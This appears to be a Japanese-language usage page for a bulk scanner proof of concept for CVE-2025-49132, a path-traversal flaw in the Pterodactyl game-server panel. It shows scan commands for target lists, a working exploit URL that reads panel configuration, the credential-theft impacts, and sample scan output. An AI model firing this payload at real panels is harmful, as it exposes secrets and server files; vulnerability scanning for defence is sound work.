
Pterodactyl翼竜パネルCVE-2025-49132一括検出☝️🤓
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
python3 CVE-2025-49132_poc.py -f 目标列表.txt
python3 CVE-2025-49132_poc.py -f 目标列表.txt -o 扫描结果.txt
脆弱性が存在する場合:
[+] 脆弱性あり: 脆弱性を確認しました
脆弱性の詳細:
• 脆弱性のタイプ: パストラバーサル
• 攻撃ベクトル: パストラバーサルパラメータを介して /locales/locale.json にアクセス
• 悪用 URL: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
潜在的な影響:
• パネル設定ファイル (.env) 内の資格情報を読み取る
• データベース内の機密情報を抽出する
• パネルが管理するゲームサーバーファイルにアクセスする
抽出された APP_KEY: base64{{your_secret_key_here}}
修正の推奨事項: Pterodactyl v1.11.11 以降に直ちにアップグレードしてください
脆弱性が存在しない場合:
[-] 脆弱性なし: 脆弱性は存在しません (ステータスコード: 404)
スキャン概要:
スキャン概要:
• スキャン対象の総数: 5
• 脆弱性が存在するターゲット: 2
• 安全なターゲット: 3
[!] 重大: 脆弱性が存在するシステムが検出されました! 直ちに対策が必要です。